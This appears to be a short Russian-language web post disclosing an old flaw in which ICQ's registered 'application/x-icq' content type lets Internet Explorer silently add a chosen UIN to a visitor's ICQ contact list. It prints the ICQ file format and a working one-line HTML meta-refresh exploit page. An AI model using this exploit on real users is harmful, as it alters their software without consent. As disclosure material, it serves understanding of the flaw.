Когда ICQ установлен, он добавляет Content-Type к Microsoft Internet Exploder, тип «application/x-icq». Когда IE получает «Content-Type:
application/x-icq" от web сервера следующего содержания: 

[ICQ User]
UIN=<uin>
Email=
NickName=
FirstName=
LastName=

IE автоматически загрузит содержание и заставит ICQ добавить этот UIN к контактному листу.

Когда web-мастер создает страницу, содержащую эксплуатирующийся код, приведенный ниже, пользователь будет автоматически добавлен к списку контакта жертвы. Эта ошибка может
использоваться против любой программы, которая использует IE.

Эксплоит просто использует ICQ Web сервер, используя search.dll: 

<HTML>
<META HTTP-EQUIV=»REFRESH» CONTENT=»0;URL=http://wwp.icq.com/scripts/search.dll?to=<uin>»>
</HTML>

Оставить мнение